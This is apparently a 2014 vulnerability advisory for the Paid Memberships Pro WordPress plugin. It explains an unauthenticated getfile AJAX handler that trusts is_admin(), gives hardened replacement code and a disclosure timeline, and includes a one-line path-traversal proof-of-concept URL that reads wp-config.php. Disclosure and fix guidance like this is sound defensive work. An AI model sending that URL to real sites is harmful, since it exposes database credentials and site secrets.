getfile.php is accessible to everyone.
File: paid-memberships-pro\includes\services.php
add_action('wp_ajax_nopriv_getfile', 'pmpro_wp_ajax_getfile');
function pmpro_wp_ajax_getfile()
{
    require_once(dirname(__FILE__) . "/../services/getfile.php");
    exit;
}
The is_admin() function is used to check privileges, but because this code runs in the context of wp-admin/admin-ajax.php, is_admin() always evaluates to true (it only reports that an admin-area script is executing, not that the caller is an administrator).
So any visitor can download any file.
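The two defects described above are the unauthenticated wp_ajax_nopriv_ hook and the reliance on is_admin() as an authorization check. The following is an added example of how a handler of this kind can be hardened; it is not code from the plugin or its vendor, and the hook name, capability, option directory and the "file" query parameter are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's own code): a hardened file-serving
// AJAX handler. Hook name, directory and parameter name are hypothetical.

// Register for logged-in users only: no wp_ajax_nopriv_ hook, so anonymous
// requests to admin-ajax.php never reach this function at all.
add_action( 'wp_ajax_example_getfile', 'example_secure_getfile' );

function example_secure_getfile() {
    // is_admin() is true for every admin-ajax.php request regardless of who
    // sent it, so it cannot serve as an authorization check. Test a real
    // capability instead (substitute the one your feature actually needs).
    if ( ! current_user_can( 'read' ) ) {
        wp_die( 'Forbidden', 403 );
    }

    // Require a nonce so the request cannot be forged cross-site.
    check_ajax_referer( 'example_getfile', 'nonce' );

    // Serve files from one dedicated directory only, by base name only, so
    // "../" sequences and absolute paths cannot escape it.
    $base = realpath( WP_CONTENT_DIR . '/uploads/example-protected' );
    $name = basename( sanitize_file_name( wp_unslash( $_GET['file'] ?? '' ) ) );
    $path = ( $base !== false && $name !== '' ) ? realpath( $base . '/' . $name ) : false;

    // After realpath(), the resolved file must still sit inside $base.
    if ( $base === false
        || $path === false
        || strpos( $path, $base . DIRECTORY_SEPARATOR ) !== 0
        || ! is_file( $path ) ) {
        wp_die( 'Not found', 404 );
    }

    // Stream the file as an opaque download; never include() or eval() it.
    nocache_headers();
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . $name . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}
```

The important design choice is that authorization is decided by current_user_can() and a nonce, not by which script happens to be executing, and that the file path is canonicalized with realpath() and then compared against the allowed directory before anything is read.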
Proof of Concept
http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
Timeline
- 14-10-2014: Discovered
- 06-11-2014: Vendor notified
- 14-11-2014: Version 1.7.15 released, issue resolved